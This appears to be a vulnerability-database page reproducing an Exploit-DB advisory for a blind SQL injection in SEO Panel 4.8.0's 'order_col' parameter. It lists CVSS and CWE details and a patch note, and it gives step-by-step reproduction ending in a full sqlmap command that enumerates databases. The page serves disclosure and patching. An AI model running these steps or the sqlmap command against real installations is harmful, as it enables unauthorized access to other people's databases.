header-logo
Suggest Exploit
vendor:
SEO Panel
by:
Piyush Patil
7.5
CVSS
HIGH
Blind SQL Injection
89
CWE
Product Name: SEO Panel
Affected Version From: 4.8.0
Affected Version To: 4.8.0
Patch Exists: YES
Related CWE: N/A
CPE: a:seopanel:seo_panel:4.8.0
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: N/A
2021

SEO Panel 4.8.0 – ‘order_col’ Blind SQL Injection (1)

SEO Panel 4.8.0 is vulnerable to Blind SQL Injection. An attacker can exploit this vulnerability by changing the 'order_col' value to '*' and then using the sqlmap tool to execute arbitrary SQL commands on the underlying database.

Mitigation:

The vendor has released a patch to address this vulnerability. It is recommended to upgrade to the latest version of SEO Panel.
Source

Exploit-DB raw data:

# Exploit Title: SEO Panel 4.8.0 - 'order_col' Blind SQL Injection (1)
# Date: 17/02/2021
# Exploit Author: Piyush Patil
# Vendor Homepage: https://www.seopanel.org/
# Software Link: https://github.com/seopanel/Seo-Panel/releases/tag/4.8.0
# Version: 4.8.0


# Reference - https://github.com/seopanel/Seo-Panel/issues/209

Step 1 - Login to the SEO Panel with admin credentials.
Step 2 - Go to archive.php
Step 3 - Change "order_col" value to "*" and copy the request
Command: sqlmap -r request.txt --batch --level 5 --risk 3 --dbms MYSQL
--dbs --technique=T --flush-session

Navigation

Suggest Exploit

Services By CQR